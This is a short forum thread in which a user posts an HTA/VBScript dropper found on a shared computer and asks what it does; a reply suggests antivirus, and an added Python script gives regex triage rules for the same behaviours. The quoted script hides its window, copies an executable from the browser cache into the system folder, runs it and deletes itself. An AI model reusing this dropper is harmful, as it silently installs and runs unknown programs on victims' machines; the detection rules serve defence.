Author: zeng7071 [zeng7071] Forum user
    HTA:APPLICATION caption="no" border="none" showintaskbar="no" >
    <object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>
    <script LANGUAGE="VBScript">
    on error resume next
    window.moveTo 0,0
    window.resizeTo 0,0
    dim exepath
    Function Search(objFolder)
        Dim objSubFolder
        For Each objFile in objFolder.Files
            If InStr(1, objfile.name, "lhxyexe", vbtextcompare) then
                set filecp = objg_fso.getfile(objfile.path)
                filecp.copy (exepath)
                exit for
            End If
        Next
        For Each objSubFolder in objFolder.SubFolders
            Search objSubFolder
        Next
    End Function
    Set objg_fso = CreateObject("Scripting.FileSystemObject")
    str=WSH.regread("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\cache")
    set tempfolder = objg_fso.getfolder(str)
    set othisfolder = objg_fso.GetSpecialFolder(1)
    exepath=othisfolder.path & "win.exe"
    search tempfolder
    wsh.run (exepath)
    wsh.run "command.com /c del c:\win.hta" ,0
    window.close()
    </script>

I don't know why, but whenever my classmate uses my machine it gets infected with this web page virus. Argh. This is written in VB, right? Please help me figure out what it does.
Original post. Posted: 04-05-20 13:55
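A static triage check for the behaviours visible in the HTA quoted in the post above, as an added example that is not part of the original thread: it flags the zero-size window, the registry lookup of the cache folder, the file copy, the run and the self-delete, and reports whether the lookup, copy and run occur together. The rule names, `triage_hta` and the benign sample are assumptions made for illustration.

```python
import re

# Each rule names one behaviour visible in the HTA quoted in the post above.
RULES = {
    "wscript_shell_object": r'clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B',
    "hidden_window": r'window\.resizeTo\s*\(?\s*0\s*,\s*0',
    "error_suppression": r'on\s+error\s+resume\s+next',
    "reads_cache_folder": r'regread\s*\(\s*"[^"]*\\Shell Folders\\cache"',
    "copies_file": r'\.copy\b',
    "runs_program": r'\.run\b',
    "self_delete": r'\bdel\s+\S+\.hta\b',
}
# Cache lookup + copy + run together is the chain that matters;
# any single rule on its own is common in harmless scripts.
CHAIN = {"reads_cache_folder", "copies_file", "runs_program"}


def triage_hta(text):
    """Return (sorted rule names that matched, True if the full chain is present)."""
    hits = {name for name, pat in RULES.items() if re.search(pat, text, re.I)}
    return sorted(hits), CHAIN <= hits


# Lines copied from the post, trimmed to the statements the rules look at.
POSTED = r'''
<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>
<script LANGUAGE="VBScript">
on error resume next
window.moveTo 0,0
window.resizeTo 0,0
str=WSH.regread("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\cache")
filecp.copy (exepath)
wsh.run (exepath)
wsh.run "command.com /c del c:\win.hta" ,0
</script>
'''

# Constructed benign HTA for contrast (not from the page).
BENIGN = r'''
<script language="VBScript">
window.resizeTo 640,480
MsgBox "Backup finished"
</script>
'''

if __name__ == "__main__":
    for label, sample in (("posted", POSTED), ("benign", BENIGN)):
        hits, chain = triage_hta(sample)
        print(label, "chain" if chain else "no chain", hits)
```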
Reply: lhx038 [lhx038] Forum user
Use McAfee
Floor B1. Posted: 04-05-20 15:07
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.